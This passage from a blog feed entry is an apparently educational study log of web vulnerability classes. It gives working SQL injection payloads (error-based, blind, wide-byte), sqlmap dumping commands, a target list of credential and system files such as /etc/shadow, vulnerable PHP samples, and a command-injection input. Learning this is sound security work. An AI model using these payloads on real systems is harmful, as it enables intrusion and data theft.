class="line"><span style="color: #BABED8">updatexml(xml_document, XPathstring, new_value)</span></span><span class="line"><span style="color: #BABED8">#first argument: a column name in the table (string)</span></span><span class="line"><span style="color: #BABED8">#second argument: a string in XPath format</span></span><span class="line"><span style="color: #BABED8">#third argument: a string that replaces the nodes matched by the XPath</span></span></code></pre></div><p><strong>"The XPath expression must be valid, otherwise an error is raised"</strong>; this can be used to trigger an error message</p><p>For example, <code>updatexml(1,concat(0x7e,database(),0))</code> produces an error message that contains the result of <code>database()</code></p></li><li><p><code>extractvalue()</code></p><div class="language-sql"><span class="lang">sql</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #BABED8">extractvalue(xml_document, xpath_string)</span></span><span class="line"><span style="color: #BABED8">#likewise triggers an error through the XPath argument</span></span></code></pre></div></li><li><p><code>floor()</code><br>Rounds down; example:</p><div class="language-sql"><span class="lang">sql</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #BABED8">xxx</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D"> and (select 2 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)#</span></span></code></pre></div></li></ul><h4 id="盲注"><a href="#盲注" class="headerlink" title="Blind injection"></a>Blind injection</h4><ul><li>The back end suppresses error messages, so injection cannot be judged from errors</li><li>Categories<ul><li>Boolean-based, e.g. <code>vince' and ascii(substr(database(),1,1))=112#</code></li><li>Time-based, e.g. <code>vince' and if((ascii(substr(database(),1,1)))=112,sleep(5),null)#</code></li></ul></li><li>Judged through <code>ascii(substr((xx语句), n, n))=x</code></li></ul><h4 id="宽字节注入"><a href="#宽字节注入" class="headerlink" title="Wide-byte injection"></a>Wide-byte injection</h4><ul><li>The back end escapes the input, turning <code>'</code> into <code>\'</code>, so the original payload <code>vince' or 1=1 ;#</code> no longer works</li><li>Because MySQL is using the GBK character set, the escaped single quote is encoded as <code>%5c%27</code>; if <code>%df</code> is placed in front of the single quote it becomes <code>%df%5c%27</code>, the leading <code>%df%5c</code> is decoded as a single Chinese character, and the single quote <code>%27</code> escapes the escaping and closes the string</li><li>The payload becomes <code>vince%df' or 1=1;#</code></li></ul><h4 id="SQLmap使用"><a href="#SQLmap使用" class="headerlink" 
title="Using sqlmap"></a>Using sqlmap</h4><p><a href="https://sqlmap.highlight.ink/">Documentation - sqlmap user manual (highlight.ink)</a></p><ol><li><div class="language-txt"><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">-u "url" --cookie="xxx" //probe the URL for injection, sending the cookie</span></span></code></pre></div></li><li><div class="language-txt"><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">-u "url" --cookie="xxx" --current-db //get the current database name</span></span></code></pre></div></li><li><div class="language-txt"><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">-u "url" --cookie="xxx" -D xxx --tables //list the table names</span></span></code></pre></div></li><li><div class="language-txt"><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">-u "url" --cookie="xxx" -D xxx -T xxx --columns //list the column names</span></span></code></pre></div></li><li><div class="language-txt"><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">-u "url" --cookie="xxx" -D xxx -T xxx -C xxx,yyy,zzz --dump //dump the specified columns</span></span></code></pre></div><p><em>Tip</em>: <code>--start 1 --stop 10</code> (fetch only the first ten entries)</p></li></ol><h2 id="文件漏洞"><a href="#文件漏洞" class="headerlink" title="File vulnerabilities"></a>File vulnerabilities</h2><h4 
id="任意文件读取与下载"><a href="#任意文件读取与下载" class="headerlink" title="Arbitrary file read and download"></a>Arbitrary file read and download</h4><h5 id="介绍-1"><a href="#介绍-1" class="headerlink" title="Introduction"></a>Introduction</h5><ul><li><p>When a site offers file read or file download functionality without restricting which files a user may read or download, a user can maliciously read or download any sensitive file</p></li><li><p>For example:</p></li></ul><div class="language-php"><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #676E95; font-style: italic">// file read</span></span><span class="line"><span style="color: #89DDFF">&lt;?</span><span style="color: #BABED8">php</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">filename </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">_GET</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">filename</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">];</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">filename</span><span style="color: #89DDFF">){</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">echo</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">file_get_contents</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">filename</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span></span><span class="line"><span style="color: #89DDFF">?&gt;</span></span></code></pre></div><div class="language-php"><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #676E95; font-style: italic">// file download</span></span><span class="line"><span style="color: #89DDFF">&lt;?</span><span style="color: #BABED8">php</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">filename </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">_GET</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">filename</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">];</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">file_exists</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">filename</span><span style="color: #89DDFF">)){</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">file</span><span style="color: #89DDFF">=</span><span style="color: #82AAFF">fopen</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">filename</span><span style="color: #89DDFF">,</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">r</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">header</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">Content-Type: application/octet-stream</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">header</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">Accept-Ranges: bytes</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">header</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">Accept-Length: </span><span style="color: #89DDFF">".</span><span style="color: #82AAFF">filesize</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">filename</span><span style="color: #89DDFF">));</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">header</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">Content-Disposition: attachment; filename=</span><span style="color: #89DDFF">"</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">.</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">filename</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">echo</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">fread</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">file</span><span style="color: #89DDFF">,</span><span style="color: #82AAFF">filesize</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">filename</span><span style="color: #89DDFF">));</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">fclose</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">file</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span></span><span class="line"><span style="color: #89DDFF">?&gt;</span></span></code></pre></div><h5 id="利用"><a href="#利用" class="headerlink" title="Exploitation"></a>Exploitation</h5><ul><li>Obtain common configuration files, such as those for SSH, WebLogic, FTP and MySQL</li><li>Obtain log files and look in them for back-end admin addresses and file upload points, and possibly backdoors left behind by others</li><li>Obtain the web application's source files for a white-box audit</li></ul><blockquote><h5 id="敏感信息"><a href="#敏感信息" class="headerlink" title="Sensitive files"></a>Sensitive files</h5><p>Windows:</p><div class="language-txt"><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">C:\boot.ini system version </span></span><span class="line"><span style="color: #babed8">C:\Windows\System32\inetsrv\MetaBase.xml IIS configuration file </span></span><span class="line"><span style="color: #babed8">C:\Windows\repair\sam stores the passwords from the initial system installation </span></span><span class="line"><span style="color: #babed8">C:\Program Files\mysql\my.ini MySQL configuration </span></span><span class="line"><span style="color: #babed8">C:\Program Files\mysql\data\mysql\user.MYD MySQL root </span></span><span class="line"><span style="color: #babed8">C:\Windows\php.ini PHP configuration </span></span><span class="line"><span style="color: #babed8">C:\Windows\my.ini MySQL configuration</span></span></code></pre></div><p>Linux:</p><div class="language-txt"><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">/root/.ssh/*</span></span><span class="line"><span style="color: #babed8">/etc/passwd </span></span><span class="line"><span style="color: #babed8">/etc/shadow </span></span><span class="line"><span style="color: #babed8">/etc/my.cnf MySQL configuration file</span></span><span class="line"><span style="color: #babed8">/etc/httpd/conf/httpd.conf Apache configuration file</span></span><span class="line"><span style="color: #babed8">/root/.bash_history user's shell command history</span></span><span class="line"><span style="color: #babed8">/root/.mysql_history MySQL command history</span></span><span class="line"><span style="color: #babed8">/proc/self/fd/fd[0-9]* (file descriptors) </span></span><span class="line"><span style="color: #babed8">/proc/mounts mounted filesystems</span></span><span class="line"><span style="color: #babed8">/proc/config.gz kernel configuration</span></span><span class="line"><span style="color: #babed8">/proc/self/cmdline command line of the current process</span></span></code></pre></div></blockquote><h4 id="文件包含漏洞"><a href="#文件包含漏洞" class="headerlink" title="File inclusion vulnerabilities"></a>File inclusion vulnerabilities</h4><ul><li><p>When <code>include</code>, <code>include_once</code>, <code>require</code> or <code>require_once</code> includes a file, that file is executed as PHP code</p></li><li><p>Exploitation conditions:</p><ul><li>The site exposes a file inclusion interface to users</li><li>The file inclusion interface performs no validation, or only loose validation</li></ul></li><li><p>For example:</p><div class="language-php"><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #89DDFF">&lt;?</span><span style="color: #BABED8">php</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">file </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">_GET</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">file</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">];</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">file_exists</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">file</span><span style="color: #89DDFF">)){</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: 
italic">include</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">file</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #89DDFF; font-style: italic">else</span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">include</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">header.php</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span></span><span class="line"><span style="color: #89DDFF">?&gt;</span></span></code></pre></div></li></ul><h4 id="任意文件删除"><a href="#任意文件删除" class="headerlink" title="Arbitrary file deletion"></a>Arbitrary file deletion</h4><ul><li><p>When a site performs file deletion and some key fields of that operation are user-controlled, a user can craft requests that delete site files or even system files</p></li><li><p>For example:</p><div class="language-php"><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #676E95; font-style: italic">/** do delete */</span></span><span class="line"><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">($</span><span style="color: #BABED8">action </span><span style="color: #89DDFF">==</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">delete</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">bakfile </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">trim</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">_GET</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">file</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">]);</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">filepath </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">DBak</span><span style="color: #89DDFF">-&gt;</span><span style="color: #BABED8">datadir</span><span style="color: #89DDFF">.</span><span style="color: #89DDFF">$</span><span style="color: #BABED8">bakfile</span><span style="color: #89DDFF">;</span></span><span class="line"></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">unlink</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">filepath</span><span style="color: #89DDFF">))</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">msgbox</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">文件删除成功!</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">fileurl</span><span style="color: #89DDFF">.'</span><span style="color: #C3E88D">?act=restore</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">else</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">msgbox</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">文件删除失败!</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span></span><span class="line"><span style="color: #89DDFF">}</span></span></code></pre></div></li></ul><h4 id="文件上传漏洞"><a href="#文件上传漏洞" class="headerlink" title="File upload vulnerabilities"></a>File upload vulnerabilities</h4><h5 id="利用条件"><a href="#利用条件" class="headerlink" title="Exploitation conditions"></a>Exploitation conditions</h5><ul><li>A file upload operation exists</li><li>Uploaded files are not validated</li><li>The user can directly or indirectly reach the uploaded file, and it can be executed</li></ul><p>For example:</p><div class="language-php"><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #676E95; font-style: italic">//DVWA</span></span><span class="line"><span style="color: #89DDFF">&lt;?</span><span style="color: #BABED8">php</span></span><span class="line"><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #89DDFF">(</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">isset</span><span style="color: #89DDFF">(</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">_POST</span><span style="color: #89DDFF">[</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">Upload</span><span style="color: #89DDFF">'</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">]</span><span style="color: #BABED8"> </span><span style="color: 
#89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">target_path </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> DVWA_WEB_PAGE_TO_ROOT </span><span style="color: #89DDFF">.</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">hackable/uploads/</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">target_path </span><span style="color: #89DDFF">.=</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">basename</span><span style="color: #89DDFF">(</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">_FILES</span><span style="color: #89DDFF">[</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">uploaded</span><span style="color: #89DDFF">'</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">][</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">name</span><span style="color: #89DDFF">'</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">]</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">);</span></span><span class="line"></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #89DDFF">(</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">!</span><span style="color: #82AAFF">move_uploaded_file</span><span style="color: #89DDFF">(</span><span 
style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">_FILES</span><span style="color: #89DDFF">[</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">uploaded</span><span style="color: #89DDFF">'</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">][</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">tmp_name</span><span style="color: #89DDFF">'</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">],</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">target_path </span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">echo</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D"><pre>Your image was not uploaded.</pre></span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">else</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">echo</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D"><pre></span><span style="color: #89DDFF">{$</span><span style="color: #BABED8">target_path</span><span style="color: #89DDFF">}</span><span style="color: #C3E88D"> succesfully uploaded!</pre></span><span style="color: #89DDFF">"</span><span style="color: 
#89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span></span><span class="line"><span style="color: #89DDFF">}</span></span><span class="line"><span style="color: #89DDFF">?></span></span></code></pre></div><h2 id="命令执行漏洞"><a href="#命令执行漏洞" class="headerlink" title="命令执行漏洞"></a>命令执行漏洞</h2><ul><li>可以让攻击者总直接注入命令或恶意代码, 控制服务器后台</li></ul><h4 id="远程系统命令执行"><a href="#远程系统命令执行" class="headerlink" title="远程系统命令执行"></a>远程系统命令执行</h4><ul><li><p><strong>原理</strong>: 系统上存在给用户提供特点的远程命令操作的接口(如ping), 但是没有严格的安全控制措施</p></li><li><p>例如: </p><div class="language-php"><button title="Copy code" class="copy"></button><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #89DDFF"><?</span><span style="color: #BABED8">php</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">isset</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">_POST</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">host</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">]))</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">host </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">_POST</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">host</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">];</span></span><span class="line"><span style="color: 
#BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">res </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">shell_exec</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">ping -c 4 </span><span style="color: #89DDFF">{$</span><span style="color: #BABED8">host</span><span style="color: #89DDFF">}"</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">echo</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">res</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span></span><span class="line"><span style="color: #89DDFF">?></span></span></code></pre></div></li><li><p>此时如果输入<code>127.0.0.1; ipconfig</code>就会把后面的命令也执行</p></li></ul><h2 id="越权漏洞"><a href="#越权漏洞" class="headerlink" title="越权漏洞"></a>越权漏洞</h2><ul><li>由于没有对用户权限进行严格的判断, 导致低权限账号可以去完成高权限账号的操作</li><li>属于逻辑漏洞, 是由于权限校验的逻辑不够严谨</li><li>水平越权<ul><li>同等权限级别间</li><li>服务器后台可能没有对用户权限做严格的判断, 可能导致一个用户能够执行另一个用户的操作</li></ul></li><li>垂直越权<ul><li>不同权限级别间</li><li>先抓取超级管理员执行增加用户的数据包, 然后退出登录, 改为登录普通管理员的账号, 将获取到的数据包的请求头中的cookie替换为普通管理员的cookie, 在请求体中填入操作信息</li></ul></li></ul><h2 id="请求伪造"><a href="#请求伪造" class="headerlink" title="请求伪造"></a>请求伪造</h2><h4 id="跨站请求伪造CSRF"><a href="#跨站请求伪造CSRF" class="headerlink" title="跨站请求伪造CSRF"></a>跨站请求伪造CSRF</h4><ul><li>通过伪装来自受信任用户的请求来利用受信任的网站</li></ul><h5 id="确认是否存在CSRF漏洞"><a href="#确认是否存在CSRF漏洞" class="headerlink" title="确认是否存在CSRF漏洞"></a>确认是否存在CSRF漏洞</h5><ul><li>判断请求是否可以被伪造</li><li>确认凭证的有效期</li></ul><h5 id="Token如何防止CDRF"><a href="#Token如何防止CDRF" class="headerlink" title="Token如何防止CDRF"></a>Token如何防止CDRF</h5><ul><li>每次请求增加一个随机码, 后台每次对次进行验证</li></ul><h4 id="服务端请求伪造SSRF"><a href="#服务端请求伪造SSRF" class="headerlink" 
title="服务端请求伪造SSRF"></a>服务端请求伪造SSRF</h4><ul><li>由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统</li></ul><p>数据流:攻击者—–>服务器—->目标地址</p><h5 id="形成原因"><a href="#形成原因" class="headerlink" title="形成原因"></a>形成原因</h5><ul><li><p>服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片,下载等等。</p><p>例如:</p><div class="language-php"><button title="Copy code" class="copy"></button><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #89DDFF"><?</span><span style="color: #BABED8">php</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #C792EA">function</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">curl</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">url</span><span style="color: #89DDFF">){</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">ch </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">curl_init</span><span style="color: #89DDFF">();</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">curl_setopt</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">ch</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> CURLOPT_URL</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">url</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">curl_setopt</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">ch</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> CURLOPT_HEADER</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> 
</span><span style="color: #F78C6C">0</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">curl_exec</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">ch</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">curl_close</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">ch</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #89DDFF">}</span></span><span class="line"><span style="color: #89DDFF">$</span><span style="color: #BABED8">url </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">_GET</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">url</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">];</span></span><span class="line"><span style="color: #82AAFF">curl</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">url</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #89DDFF">?></span></span></code></pre></div></li></ul><h2 id="会话管理漏洞"><a href="#会话管理漏洞" class="headerlink" title="会话管理漏洞"></a>会话管理漏洞</h2><h4 id="会话劫持"><a href="#会话劫持" class="headerlink" title="会话劫持"></a>会话劫持</h4><ul><li>获取用户Session ID后使用该Session ID进行伪装</li></ul><h5 id="攻击步骤"><a href="#攻击步骤" class="headerlink" title="攻击步骤"></a>攻击步骤</h5><ul><li><p>目标用户需要先登录站点</p></li><li><p>登录成功后,该用户会得到站点提供的一个会话标识SessionID</p></li><li><p>攻击者通过某种攻击手段捕获Session ID</p></li><li><p>攻击者通过捕获到的Session ID访问站点即可获得目标用户合法会话</p><p><em>#Session ID一般都设置在cookie中。</em></p></li></ul><h4 id="会话固定"><a href="#会话固定" class="headerlink" title="会话固定"></a>会话固定</h4><ul><li>诱骗受害者使用攻击者指定的会话标识</li></ul><h5 id="原理"><a href="#原理" class="headerlink" 
title="原理"></a>原理</h5><ul><li>访问网站时,网站会设置cookie中的session</li><li>当用户登录后,cookie中的session保持不变</li><li>只要获取登陆前的session内容,就可以知道登陆后的session</li></ul>]]></content>
<summary type="html"><h2 id="暴力破解漏洞"><a href="#暴力破解漏洞" class="headerlink" title="暴力破解漏洞"></a>Brute-force vulnerabilities</h2><ul>
<li>By systematically combining <strong>all</strong> possibilities (for example the account names and passwords used to log in), attempting</summary>
<category term="网络安全" scheme="https://myprefer.github.io/tags/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/"/>
<category term="学习日志" scheme="https://myprefer.github.io/tags/%E5%AD%A6%E4%B9%A0%E6%97%A5%E5%BF%97/"/>
<category term="WEB攻防" scheme="https://myprefer.github.io/tags/WEB%E6%94%BB%E9%98%B2/"/>
<category term="漏洞分类" scheme="https://myprefer.github.io/tags/%E6%BC%8F%E6%B4%9E%E5%88%86%E7%B1%BB/"/>
</entry>
<entry>
<title>Pikachu Lab Hands-on Practice</title>
<link href="https://myprefer.github.io/post/Pikachu%E9%9D%B6%E5%9C%BA%E5%AE%9E%E6%93%8D.html"/>
